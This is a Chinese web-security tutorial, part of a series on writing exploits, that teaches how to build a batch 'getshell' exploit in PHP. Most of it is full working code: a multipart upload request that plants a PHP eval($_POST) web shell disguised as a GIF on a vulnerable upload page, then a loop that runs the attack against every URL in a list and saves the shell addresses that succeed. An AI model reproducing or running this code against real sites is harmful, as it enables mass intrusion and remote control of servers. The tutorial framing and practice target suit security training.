WEB安全第七章exp编写五 批量GETSHELL编写
第二篇 exp编写二 POST注入exp编写
第三篇 getshell exp的编写
通过以上exp学习,基本的exp编写,应该问题不大,接下来就学习的批量exp编写。
批量exp 有什么用,例如某个大型cms【cms内容管理系统】如dedecms、WordPress、phpcms 突然出了漏洞。各大安全src发布预警信息。
经过安全研究员摸索,poc很快地发布到网上,提供安全人员检测。 网站管理员 和运维dog 也开始 处理这次事件。
你的企业或任务上很多这样的网站,并不知道是否存在漏洞,总不能每个用手工去测试。
这样就要提高效率,进行批量测试。
php学习
以前编写的exp脚本 都需要命令行运行 exp 如: php.exe exp.php 这样感觉不够人性化,也不方便。
想要在php.exe exp.php filename.txt filename.txt 里面是你要检测的网址。
如何做到这点。 php提供了一个变量 $argv 当这个变量仅在 register_argc_argv 打开时可用。 注参开 http://php.net/manual/zh/reserved.variables.argv.php
<?php var_dump($argv);?> 终端下运行 php argv.php url.txt
通过这个命令可以看出 这里有两个数组 0默认是脚本名 1 是txt文件名。
漏洞就拿 暗月靶机系统 上传漏洞测试那个exp
<?php function http_send($host, $packet){ $sock = fsockopen($host, 80); if(!$sock){ print "/n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) { $resp .= fread($sock, 1024); } fclose($sock); return $resp; } function data($host,$filename){ $payload = "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"/r/n"; $payload .= "Content-Type: image/jpeg/r/n/r/n"; $payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n"; $payload .= "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="sub""; $payload .="/r/n/r/n"; $payload .="12132/r/n"; $payload .="-----------------------------86531354118821--/r/n"; $packet = "POST /upload.php HTTP/1.1/r/n"; $packet .= "Host: {$host}/r/n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821/r/n"; $packet .= "Content-Length: ".strlen($payload)."/r/n"; $packet .= "Connection: close/r/n/r/n"; $packet .= $payload; return $packet; } $filename = "moon.php"; $host = "target_sys.com"; $html_str =http_send($host,data($host,$filename)); preg_match("/Stored in: (.*?)</", $html_str,$m); if ($m[1]){ echo "http://".$host."/".$m[1]; }else{ echo "flase"; }
这个exp 现在进行修改。修改的思路是 读取文件,将里的url遍历测试,把结果保存起来。
<?php function http_send($host, $packet){ $sock = fsockopen($host, 80); if(!$sock){ print "/n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) { $resp .= fread($sock, 1024); } fclose($sock); return $resp; } function data($host,$filename){ $payload = "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"/r/n"; $payload .= "Content-Type: image/jpeg/r/n/r/n"; $payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n"; $payload .= "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="sub""; $payload .="/r/n/r/n"; $payload .="12132/r/n"; $payload .="-----------------------------86531354118821--/r/n"; $packet = "POST /upload.php HTTP/1.1/r/n"; $packet .= "Host: {$host}/r/n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821/r/n"; $packet .= "Content-Length: ".strlen($payload)."/r/n"; $packet .= "Connection: close/r/n/r/n"; $packet .= $payload; return $packet; } function w($fileName,$data){ fwrite(fopen($fileName,"a+"),$data."/r/n"); } function exploit($host){ $filename = "moon.php"; $resulit=''; $html_str =http_send($host,data($host,$filename)); preg_match("/Stored in: (.*?)</", $html_str,$m); if ($m[1]){ $resulit="http://".$host."/".$m[1]; } return $resulit; } if(count($argv)<3){ print $argv[0]." url.txt save.txt"; exit; } $url_txt = $argv[1]; $sava_file = $argv[2]; $myurl = file($url_txt); foreach ($myurl as $value){ echo "Testing {$value}"; $v = substr($value,strpos($value,"//")+2); $v = trim(str_replace("/","",$v)); $result = exploit($v); if($result){ w($sava_file,$result); } sleep(1); }
下载 exp4.rar 
测试结果 
foreach ($myurl as $value){ echo "Testing {$value}"; $v = substr($value,strpos($value,"//")+2); $v = trim(str_replace("/","",$v)); $result = exploit($v); if($result){ w($sava_file,$result); } sleep(1); }
个部分就是 遍历检测url的代码。 将结果保存在 $sava_file = save.txt
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论